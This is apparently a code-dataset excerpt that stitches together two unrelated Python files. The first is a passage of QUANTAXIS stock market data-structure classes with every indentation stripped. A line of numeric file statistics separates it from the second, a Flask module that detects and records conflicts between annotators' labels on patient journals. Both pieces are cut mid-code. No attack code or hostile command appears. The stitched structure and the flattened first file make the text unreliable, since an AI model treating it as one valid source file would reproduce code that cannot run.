self.data[self.data['code'] == x].set_index(['datetime', 'code'], drop=False)), self.code))))
def add_func(self, func, *arg, **kwargs):
return self.sync_status(QA_DataStruct_Index_min(pd.concat(list(map(lambda x: func(
self.data[self.data['code'] == x], *arg, **kwargs), self.code)))))
def pivot(self, column_):
assert isinstance(column_, str)
try:
return self.data.pivot(index='datetime', columns='code', values=column_)
except KeyError:  # no 'datetime' column; fall back to the 'date' index
return self.data.pivot(index='date', columns='code', values=column_)
def select_time(self, start, end):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Index_min(self.data[self.data['date'] >= start][self.data['date'] <= end].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Index_min(self.data[self.data['datetime'] >= start][self.data['datetime'] <= end].set_index(['datetime', 'code'], drop=False)))
def select_time_with_gap(self, time, gap, method):
if method in ['gt', '>']:
def __gt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] > time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] > time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_min(pd.concat(list(map(lambda x: __gt(x), self.splits())))))
elif method in ['gte', '>=']:
def __gte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] >= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] >= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_min(pd.concat(list(map(lambda x: __gte(x), self.splits())))))
elif method in ['lt', '<']:
def __lt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] < time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] < time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_min(pd.concat(list(map(lambda x: __lt(x), self.splits())))))
elif method in ['lte', '<=']:
def __lte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] <= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] <= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_min(pd.concat(list(map(lambda x: __lte(x), self.splits())))))
elif method in ['e', '==', '=', 'equal']:
def __eq(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] == time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] == time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_min(pd.concat(list(map(lambda x: __eq(x), self.splits())))))
def select_code(self, code):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Index_min(self.data[self.data['code'] == code].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Index_min(self.data[self.data['code'] == code].set_index(['datetime', 'code'], drop=False)))
def get_bar(self, code, time):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Index_min((self.data[self.data['code'] == code])[self.data['date'] == str(time)[0:10]].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Index_min((self.data[self.data['code'] == code])[self.data['datetime'] == str(time)[0:19]].set_index(['datetime', 'code'], drop=False)))
class QA_DataStruct_Stock_min(stock_hq_base):
def __init__(self, DataFrame):
self.type = 'stock_min'
self.if_fq = 'bfq'
self.mongo_coll = QA_Setting.client.quantaxis.stock_min
self.open = DataFrame['open']
self.high = DataFrame['high']
self.low = DataFrame['low']
self.close = DataFrame['close']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
self.date = DataFrame['date']
self.data = DataFrame
self.datetime = self.data.index.levels[self.data.index.names.index(
'datetime')]
self.index = DataFrame.index
self.code = self.data.index.levels[self.data.index.names.index('code')]
def to_qfq(self):
if self.if_fq == 'bfq':
data = QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: QA_data_stock_to_fq(
self.data[self.data['code'] == x]), self.code))).set_index(['datetime', 'code'], drop=False))
data.if_fq = 'qfq'
return data
else:
QA_util_log_info(
'unsupported type for qfq; current type is: %s' % self.if_fq)
return self
def to_hfq(self):
if self.if_fq == 'bfq':
data = QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: QA_data_stock_to_fq(
self.data[self.data['code'] == x], '01'), self.code))).set_index(['datetime', 'code'], drop=False))
data.if_fq = 'hfq'
return data
else:
QA_util_log_info(
'unsupported type for hfq; current type is: %s' % self.if_fq)
return self
def ATR(self, gap=14):
list_mtr = []
__id = -gap
while __id < 0:
list_mtr.append(max(self.high[__id] - self.low[__id], abs(
self.close[__id - 1] - self.high[__id]), abs(self.close[__id - 1] - self.low[__id])))
__id += 1
res = talib.MA(np.array(list_mtr), gap)
return list_mtr[-1], res[-1]
def KDJ(self, N=9, M1=3, M2=3):
# https://www.joinquant.com/post/142 -- compute K and D first
__K, __D = talib.STOCHF(np.array(self.high[-(N + M1 + M2 + 1):]), np.array(self.low[-(
N + M1 + M2 + 1):]), np.array(self.close[-(N + M1 + M2 + 1):]), N, M2, fastd_matype=0)
K = np.array(
list(map(lambda x: SMA(__K[:x], M1), range(1, len(__K) + 1))))
D = np.array(list(map(lambda x: SMA(K[:x], M2), range(1, len(K) + 1))))
J = K * 3 - D * 2
return K[-1], D[-1], J[-1]
def JLHB(self, N=7, M=5):
pass
def len(self):
return len(self.data)
def reverse(self):
return QA_DataStruct_Stock_min(self.data[::-1])
def show(self):
return QA_util_log_info(self.data)
def query(self, query_text):
return self.data.query(query_text)
def to_list(self):
return np.asarray(self.data).tolist()
def to_pd(self):
return self.data
def to_numpy(self):
return np.asarray(self.data)
def to_json(self):
return QA_util_to_json_from_pandas(self.data)
def sync_status(self, QA_DataStruct_Stock_min):
'Fixed state must be kept in sync, especially when creating a new datastruct'
(QA_DataStruct_Stock_min.if_fq, QA_DataStruct_Stock_min.type, QA_DataStruct_Stock_min.mongo_coll) = (
self.if_fq, self.type, self.mongo_coll)
return QA_DataStruct_Stock_min
def splits(self):
if self.type in ['stock_day', 'index_day']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['date', 'code'], drop=False)), self.code))))
elif self.type in ['stock_min','index_min']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['datetime', 'code'], drop=False)), self.code))))
def add_func(self, func, *arg, **kwargs):
return self.sync_status(QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: func(
self.data[self.data['code'] == x], *arg, **kwargs), self.code)))))
def pivot(self, column_):
assert isinstance(column_, str)
try:
return self.data.pivot(index='datetime', columns='code', values=column_)
except KeyError:  # no 'datetime' column; fall back to the 'date' index
return self.data.pivot(index='date', columns='code', values=column_)
def select_time(self, start, end):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Stock_min(self.data[self.data['date'] >= start][self.data['date'] <= end].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Stock_min(self.data[self.data['datetime'] >= start][self.data['datetime'] <= end].set_index(['datetime', 'code'], drop=False)))
def select_time_with_gap(self, time, gap, method):
if method in ['gt', '>']:
def __gt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] > time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] > time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: __gt(x), self.splits())))))
elif method in ['gte', '>=']:
def __gte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] >= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] >= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: __gte(x), self.splits())))))
elif method in ['lt', '<']:
def __lt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] < time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] < time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: __lt(x), self.splits())))))
elif method in ['lte', '<=']:
def __lte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] <= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] <= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: __lte(x), self.splits())))))
elif method in ['e', '==', '=', 'equal']:
def __eq(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] == time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] == time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: __eq(x), self.splits())))))
def select_code(self, code):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Stock_min(self.data[self.data['code'] == code].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Stock_min(self.data[self.data['code'] == code].set_index(['datetime', 'code'], drop=False)))
def get_bar(self, code, time):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Stock_min((self.data[self.data['code'] == code])[self.data['date'] == str(time)[0:10]].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Stock_min((self.data[self.data['code'] == code])[self.data['datetime'] == str(time)[0:19]].set_index(['datetime', 'code'], drop=False)))
class QA_DataStruct_Stock_day(stock_hq_base):
def __init__(self, DataFrame):
self.data = DataFrame
self.type = 'stock_day'
self.if_fq = 'bfq'
self.mongo_coll = QA_Setting.client.quantaxis.stock_day
self.open = DataFrame['open']
self.high = DataFrame['high']
self.low = DataFrame['low']
self.close = DataFrame['close']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
self.date = self.data.index.levels[self.data.index.names.index('date')]
self.index = DataFrame.index
self.code = self.data.index.levels[self.data.index.names.index('code')]
def to_qfq(self):
if self.if_fq == 'bfq':
data = QA_DataStruct_Stock_day(pd.concat(list(map(
lambda x: QA_data_stock_to_fq(self.data[self.data['code'] == x]), self.code))))
data.if_fq = 'qfq'
return data
else:
QA_util_log_info(
'unsupported type for qfq; current type is: %s' % self.if_fq)
return self
def to_hfq(self):
if self.if_fq == 'bfq':
data = QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: QA_data_stock_to_fq(
self.data[self.data['code'] == x], '01'), self.code))))
data.if_fq = 'hfq'
return data
else:
QA_util_log_info(
'unsupported type for hfq; current type is: %s' % self.if_fq)
return self
def len(self):
return len(self.data)
def reverse(self):
return QA_DataStruct_Stock_day(self.data[::-1])
def show(self):
return QA_util_log_info(self.data)
def query(self, query_text):
return self.data.query(query_text)
def to_list(self):
return np.asarray(self.data).tolist()
def to_pd(self):
return self.data
def to_numpy(self):
return np.asarray(self.data)
def to_json(self):
return QA_util_to_json_from_pandas(self.data)
def sync_status(self, QA_DataStruct_Stock_day):
'Fixed state must be kept in sync, especially when creating a new datastruct'
(QA_DataStruct_Stock_day.if_fq, QA_DataStruct_Stock_day.type, QA_DataStruct_Stock_day.mongo_coll) = (
self.if_fq, self.type, self.mongo_coll)
return QA_DataStruct_Stock_day
def splits(self):
if self.type in ['stock_day', 'index_day']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['date', 'code'], drop=False)), self.code))))
elif self.type in ['stock_min','index_min']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['datetime', 'code'], drop=False)), self.code))))
def add_func(self, func, *arg, **kwargs):
return self.sync_status(QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: func(
self.data[self.data['code'] == x], *arg, **kwargs), self.code)))))
def pivot(self, column_):
assert isinstance(column_, str)
try:
return self.data.pivot(index='datetime', columns='code', values=column_)
except KeyError:  # no 'datetime' column; fall back to the 'date' index
return self.data.pivot(index='date', columns='code', values=column_)
def select_time(self, start, end):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Stock_day(self.data[self.data['date'] >= start][self.data['date'] <= end].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Stock_day(self.data[self.data['datetime'] >= start][self.data['datetime'] <= end].set_index(['datetime', 'code'], drop=False)))
def select_time_with_gap(self, time, gap, method):
if method in ['gt', '>']:
def __gt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] > time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] > time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: __gt(x), self.splits())))))
elif method in ['gte', '>=']:
def __gte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] >= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] >= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: __gte(x), self.splits())))))
elif method in ['lt', '<']:
def __lt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] < time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] < time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: __lt(x), self.splits())))))
elif method in ['lte', '<=']:
def __lte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] <= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] <= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: __lte(x), self.splits())))))
elif method in ['e', '==', '=', 'equal']:
def __eq(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] == time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] == time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: __eq(x), self.splits())))))
def select_code(self, code):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Stock_day(self.data[self.data['code'] == code].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Stock_day(self.data[self.data['code'] == code].set_index(['datetime', 'code'], drop=False)))
def get_bar(self, code, time):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Stock_day((self.data[self.data['code'] == code])[self.data['date'] == str(time)[0:10]].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Stock_day((self.data[self.data['code'] == code])[self.data['datetime'] == str(time)[0:19]].set_index(['datetime', 'code'], drop=False)))
class QA_DataStruct_Stock_transaction():
def __init__(self, DataFrame):
self.type = 'stock_transaction'
self.if_fq = 'None'
self.mongo_coll = QA_Setting.client.quantaxis.stock_transaction
self.buyorsell = DataFrame['buyorsell']
self.price = DataFrame['price']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
self.date = DataFrame['date']
self.time = DataFrame['time']
self.datetime = DataFrame['datetime']
self.order = DataFrame['order']
self.index = DataFrame.index
self.data = DataFrame
def resample(self, type_='1min'):
return QA_DataStruct_Stock_min(QA_data_tick_resample(self.data, type_))
class QA_DataStruct_Market_reply():
pass
class QA_DataStruct_Market_bid():
pass
class QA_DataStruct_Market_bid_queue():
pass
class QA_DataStruct_ARP_account():
pass
class QA_DataStruct_Quantaxis_error():
pass
| 48.663403 | 186 | 0.600332 | 5,327 | 39,758 | 4.232964 | 0.035667 | 0.07415 | 0.05304 | 0.05987 | 0.944077 | 0.927003 | 0.92319 | 0.917513 | 0.913788 | 0.906559 | 0 | 0.002839 | 0.23799 | 39,758 | 816 | 187 | 48.723039 | 0.741451 | 0.006665 | 0 | 0.775264 | 0 | 0 | 0.105627 | 0 | 0 | 0 | 0 | 0 | 0.007541 | 1 | 0.180995 | false | 0.00905 | 0.016591 | 0.069382 | 0.496229 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
# annotation_web_client/conflict.py
# From levon003/icwsm-cancer-journeys (MIT license)
Blueprint, flash, g, redirect, render_template, request, url_for, make_response
)
from werkzeug.exceptions import abort
from annotation_web_client.auth import login_required
from annotation_web_client.db import get_db
from annotation_web_client.annotate import get_journal_annotations
from annotation_web_client.site_df import get_site_df, get_journals, get_journals_user_dict
from annotation_web_client.sites import view_site
from annotation_web_client.journal_db import get_journal_db
bp = Blueprint('conflict', __name__)
@bp.route('/conflict/journal/responsibilities/', methods=('GET',))
def view_journal_responsibility_conflict_summary():
db = get_db()
users = db.execute(
'SELECT username FROM user'
).fetchall()
username_list = [user['username'] for user in users]
user_list = []
for username in username_list:
cursor = db.execute(
"""SELECT COUNT(*) AS responsibility_count FROM (
SELECT site_id, journal_oid
FROM journalAnnotation
WHERE username = ? AND annotation_type = ?
GROUP BY site_id, journal_oid, annotation_type, username)""",
(username, 'journal_patient_responsibilities'))
responsibility_count = cursor.fetchone()['responsibility_count']
if responsibility_count > 0:
user_list.append({'username': username, 'responsibility_count': responsibility_count})
user_list.sort(key=lambda user: user['responsibility_count'], reverse=True)
return render_template('conflict/journalResponsibilityConflictSummary.html', annotator_list=user_list)
@bp.route('/conflict/journal/responsibilities/<user1>/vs/<user2>', methods=('GET',))
def view_journal_responsibility_conflicts(user1, user2):
try:
responsibilities1 = get_journal_annotations('journal_patient_responsibilities', user1)
responsibilities2 = get_journal_annotations('journal_patient_responsibilities', user2)
except Exception:
return f"Failed to load journal responsibility annotations for users '{user1}' and '{user2}'."
journal_db = get_journal_db()
responsibility_dict1 = {}
responsibility_dict2 = {}
for responsibility_annotation in responsibilities1:
key = f"{responsibility_annotation['site_id']}|{responsibility_annotation['journal_oid']}"
responsibility_dict1[key] = responsibility_annotation['data']
for responsibility_annotation in responsibilities2:
key = f"{responsibility_annotation['site_id']}|{responsibility_annotation['journal_oid']}"
responsibility_dict2[key] = responsibility_annotation['data']
conflict_list = []
common_journal_keys = set(responsibility_dict1.keys()).intersection(set(responsibility_dict2.keys()))
for key in common_journal_keys:
data1 = responsibility_dict1[key]
data2 = responsibility_dict2[key]
r1 = set(data1.split("|"))
r2 = set(data2.split("|"))
if r1 != r2:
# this is a conflict
site_id, journal_oid = key.split("|")
in_common = ", ".join(list(r1 & r2))
user1_only = ", ".join(list(r1 - r2))
user2_only = ", ".join(list(r2 - r1))
journal_index = journal_db.execute("""
SELECT site_index
FROM journalMetadata
WHERE site_id = ? AND journal_oid = ?
""", (site_id, journal_oid)).fetchone()['site_index']
resolution = get_journal_annotation_conflict_resolution('journal_patient_responsibilities',
site_id,
journal_oid)
resolved = False
correct_username = ""
if resolution is not None:
# Only consider the situation resolved if a correct username was provided
resolved = resolution['resolution_type'] == 'username'
if resolved:
correct_username = resolution['correct_username'].strip()
conflict = {"site_id": site_id,
"journal_oid": journal_oid,
"journal_index": journal_index,
"user1_responsibility_list": r1,
"user2_responsibility_list": r2,
"in_common": in_common,
"user1_only": user1_only,
"user2_only": user2_only,
"conflict_resolved": resolved,
"correct_username": correct_username
}
conflict_list.append(conflict)
# sort the conflict_list based on the site_id and the journal_index
conflict_list.sort(key=lambda conflict: (conflict['site_id'], conflict['journal_index']))
return render_template('conflict/journalResponsibilityConflictPair.html',
user1=user1,
user2=user2,
conflict_list=conflict_list)
@bp.route('/conflict/journal/responsibilities/<user1>/vs/<user2>/site/<int:site_id>', methods=('GET', 'POST'))
def view_site_journal_responsibility_conflicts(user1, user2, site_id):
if request.method == 'POST':
# intercept POSTs that are for conflict-resolution of journal phase annotations
if 'conflict_type' in request.form and request.form['conflict_type'] == 'journal_patient_responsibilities':
journal_oid = request.form['journal_oid']
correct_username = request.form['correct_username']
set_journal_annotation_conflict_resolution('journal_patient_responsibilities',
site_id,
journal_oid,
correct_username)
return make_response("OK", 200)
# This isn't a conflict-resolution post, so let view_site handle it.
return view_site(site_id)
# This is a GET request
try:
responsibilities1 = get_journal_annotations('journal_patient_responsibilities', user1)
responsibilities2 = get_journal_annotations('journal_patient_responsibilities', user2)
except Exception:
return f"Failed to load journal responsibility annotations for users '{user1}' and '{user2}'."
journal_db = get_journal_db()
responsibility_dict1 = {}
responsibility_dict2 = {}
for responsibility_annotation in responsibilities1:
if responsibility_annotation['site_id'] != site_id:
continue
key = responsibility_annotation['journal_oid']
responsibility_dict1[key] = responsibility_annotation['data']
for responsibility_annotation in responsibilities2:
if responsibility_annotation['site_id'] != site_id:
continue
key = responsibility_annotation['journal_oid']
responsibility_dict2[key] = responsibility_annotation['data']
conflict_list = []
common_journal_keys = set(responsibility_dict1.keys()).intersection(set(responsibility_dict2.keys()))
for key in common_journal_keys:
data1 = responsibility_dict1[key]
data2 = responsibility_dict2[key]
r1 = set(data1.split("|"))
r2 = set(data2.split("|"))
if r1 != r2:
# this is a conflict
journal_oid = key
in_common = ", ".join(list(r1 & r2))
user1_only = ", ".join(list(r1 - r2))
user2_only = ", ".join(list(r2 - r1))
journal_index = journal_db.execute("""
SELECT site_index
FROM journalMetadata
WHERE site_id = ? AND journal_oid = ?
""", (site_id, journal_oid)).fetchone()['site_index']
resolution = get_journal_annotation_conflict_resolution('journal_patient_responsibilities',
site_id,
journal_oid)
resolved = False
correct_username = ""
if resolution is not None:
# Only consider the situation resolved if a correct username was provided
resolved = resolution['resolution_type'] == 'username'
if resolved:
correct_username = resolution['correct_username'].strip()
conflict = {"site_id": site_id,
"journal_oid": journal_oid,
"journal_index": journal_index,
"user1_responsibility_list": data1,
"user2_responsibility_list": data2,
"in_common": in_common,
"user1_only": user1_only,
"user2_only": user2_only,
"conflict_resolved": resolved,
"correct_username": correct_username}
conflict_list.append(conflict)
# sort the conflict_list based on the site_id and the journal_index
conflict_list.sort(key=lambda conflict: (conflict['site_id'], conflict['journal_index']))
return view_site(site_id, user1=user1, user2=user2, responsibility_conflict_list=conflict_list)
@bp.route('/conflict/journal/phases/', methods=('GET',))
def view_journal_phase_conflict_summary():
db = get_db()
users = db.execute(
'SELECT username FROM user'
).fetchall()
username_list = [user['username'] for user in users]
user_list = []
for username in username_list:
cursor = db.execute(
"""SELECT COUNT(*) AS phase_count FROM (
SELECT site_id, journal_oid
FROM journalAnnotation
WHERE username = ? AND annotation_type = ?
GROUP BY site_id, journal_oid, annotation_type, username)""",
(username, 'journal_journey_phase'))
phase_count = cursor.fetchone()['phase_count']
if phase_count > 0:
user_list.append({'username': username, 'phase_count': phase_count})
user_list.sort(key=lambda user: user['phase_count'], reverse=True)
return render_template('conflict/journalPhaseConflictSummary.html', annotator_list=user_list)
@bp.route('/conflict/journal/phases/<user1>/vs/<user2>', methods=('GET',))
def view_journal_phase_conflicts(user1, user2):
try:
phases1 = get_journal_annotations('journal_journey_phase', user1)
phases2 = get_journal_annotations('journal_journey_phase', user2)
except Exception:
return f"Failed to load journal phase annotations for users '{user1}' and '{user2}'."
journal_db = get_journal_db()
phase_dict1 = {}
phase_dict2 = {}
for phase_annotation in phases1:
key = f"{phase_annotation['site_id']}|{phase_annotation['journal_oid']}"
phase_dict1[key] = phase_annotation['data']
for phase_annotation in phases2:
key = f"{phase_annotation['site_id']}|{phase_annotation['journal_oid']}"
phase_dict2[key] = phase_annotation['data']
conflict_list = []
common_journal_keys = set(phase_dict1.keys()).intersection(set(phase_dict2.keys()))
for key in common_journal_keys:
data1 = phase_dict1[key]
data2 = phase_dict2[key]
p1 = set(data1.split("|"))
p2 = set(data2.split("|"))
if "unknown" in p1:
p1.remove("unknown")
if "unknown" in p2:
p2.remove("unknown")
if p1 != p2:
# this is a conflict
site_id, journal_oid = key.split("|")
in_common = ", ".join(list(p1 & p2))
user1_only = ", ".join(list(p1 - p2))
user2_only = ", ".join(list(p2 - p1))
journal_index = journal_db.execute("""
SELECT site_index
FROM journalMetadata
WHERE site_id = ? AND journal_oid = ?
""", (site_id, journal_oid)).fetchone()['site_index']
resolution = get_journal_annotation_conflict_resolution('journal_journey_phase',
site_id,
journal_oid)
resolved = False
correct_username = ""
if resolution is not None:
# Only consider the situation resolved if a correct username was provided
resolved = resolution['resolution_type'] == 'username'
if resolved:
correct_username = resolution['correct_username'].strip()
conflict = {"site_id": site_id,
"journal_oid": journal_oid,
"journal_index": journal_index,
"user1_phase_list": p1,
"user2_phase_list": p2,
"in_common": in_common,
"user1_only": user1_only,
"user2_only": user2_only,
"conflict_resolved": resolved,
"correct_username": correct_username
}
conflict_list.append(conflict)
# sort the conflict_list based on the site_id and the journal_index
conflict_list.sort(key=lambda conflict: (conflict['site_id'], conflict['journal_index']))
return render_template('conflict/journalPhaseConflictPair.html',
user1=user1,
user2=user2,
conflict_list=conflict_list)
@bp.route('/conflict/journal/phases/<user1>/vs/<user2>/site/<int:site_id>', methods=('GET', 'POST'))
def view_site_journal_phase_conflicts(user1, user2, site_id):
    if request.method == 'POST':
        # intercept POSTs that are for conflict-resolution of journal phase annotations
        if 'conflict_type' in request.form and request.form['conflict_type'] == 'journal_journey_phase':
            journal_oid = request.form['journal_oid']
            correct_username = request.form['correct_username']
            set_journal_annotation_conflict_resolution('journal_journey_phase',
                                                       site_id,
                                                       journal_oid,
                                                       correct_username)
            return make_response("OK", 200)
        # This isn't a conflict-resolution POST, so let view_site handle it.
        return view_site(site_id)

    # This is a GET request
    try:
        phases1 = get_journal_annotations('journal_journey_phase', user1)
        phases2 = get_journal_annotations('journal_journey_phase', user2)
    except Exception:
        return f"Failed to load journal phase annotations for users '{user1}' and '{user2}'."
    journal_db = get_journal_db()

    phase_dict1 = {}
    phase_dict2 = {}
    for phase_annotation in phases1:
        if phase_annotation['site_id'] != site_id:
            continue
        key = phase_annotation['journal_oid']
        phase_dict1[key] = phase_annotation['data']
    for phase_annotation in phases2:
        if phase_annotation['site_id'] != site_id:
            continue
        key = phase_annotation['journal_oid']
        phase_dict2[key] = phase_annotation['data']

    conflict_list = []
    common_journal_keys = set(phase_dict1.keys()).intersection(set(phase_dict2.keys()))
    for key in common_journal_keys:
        data1 = phase_dict1[key]
        data2 = phase_dict2[key]
        p1 = set(data1.split("|"))
        p2 = set(data2.split("|"))
        if "unknown" in p1:
            p1.remove("unknown")
        if "unknown" in p2:
            p2.remove("unknown")
        if p1 != p2:
            # this is a conflict
            journal_oid = key
            in_common = ", ".join(list(p1 & p2))
            user1_only = ", ".join(list(p1 - p2))
            user2_only = ", ".join(list(p2 - p1))
            journal_index = journal_db.execute("""
                SELECT site_index
                FROM journalMetadata
                WHERE site_id = ? AND journal_oid = ?
            """, (site_id, journal_oid)).fetchone()['site_index']
            resolution = get_journal_annotation_conflict_resolution('journal_journey_phase',
                                                                    site_id,
                                                                    journal_oid)
            resolved = False
            correct_username = ""
            if resolution is not None:
                # Only consider the situation resolved if a correct username was provided
                resolved = resolution['resolution_type'] == 'username'
                if resolved:
                    correct_username = resolution['correct_username'].strip()
            conflict = {"site_id": site_id,
                        "journal_oid": journal_oid,
                        "journal_index": journal_index,
                        "user1_phase_list": data1,
                        "user2_phase_list": data2,
                        "in_common": in_common,
                        "user1_only": user1_only,
                        "user2_only": user2_only,
                        "conflict_resolved": resolved,
                        "correct_username": correct_username}
            conflict_list.append(conflict)
    # sort the conflict_list based on the site_id and the journal_index
    conflict_list.sort(key=lambda conflict: (conflict['site_id'], conflict['journal_index']))
    return view_site(site_id, user1=user1, user2=user2, phase_conflict_list=conflict_list)


def get_journal_annotation_conflict_resolution(annotation_type, site_id, journal_oid, default=None):
    db = get_db()
    cursor = db.execute("""
        SELECT *
        FROM journalAnnotationConflictResolution
        WHERE site_id = ? AND journal_oid = ? AND annotation_type = ?
        ORDER BY id DESC
        """, (site_id, journal_oid, annotation_type))
    resolution = cursor.fetchone()
    if resolution is not None:
        return resolution
    else:
        return default


def set_journal_annotation_conflict_resolution(annotation_type, site_id, journal_oid, correct_username, resolving_username=None, commit=True):
